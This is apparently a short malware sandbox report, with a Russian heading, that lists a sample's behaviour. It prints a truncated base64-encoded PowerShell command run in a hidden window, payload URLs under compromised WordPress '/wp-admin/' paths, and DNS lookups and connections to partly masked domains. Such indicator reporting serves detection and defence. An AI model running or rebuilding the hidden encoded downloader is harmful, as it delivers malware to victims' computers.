Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABMAHMAaABrAHYAcQBnAHAAZAB0AD0AJwBCAHkAaAB4AHkAbgBuAGEAYQB6ACcAOwAkAE4AbQBiAGUAZgBhAGcAdABjAHQAZQBmAH...
- 've####gmt.com.mx':80
- 'em###tech.cl':80
- 'em###tech.cl':443
- 'gi####arning.org':443
- http://ve####gmt.com.mx/wp-admin/PpCEyUB/
- http://em###tech.cl/wp-admin/aAqRRp/
- 'em###tech.cl':443
- DNS ASK ve####gmt.com.mx
- DNS ASK em###tech.cl
- DNS ASK co#####emarketing.club
- DNS ASK da###tone.top
- DNS ASK gi####arning.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABMAHMAaABrAHYAcQBnAHAAZAB0AD0AJwBCAHkAaAB4AHkAbgBuAGEAYQB6ACcAOwAkAE4AbQBiAGUAZgBhAGcAdABjAHQAZQBmAH...' (со скрытым окном)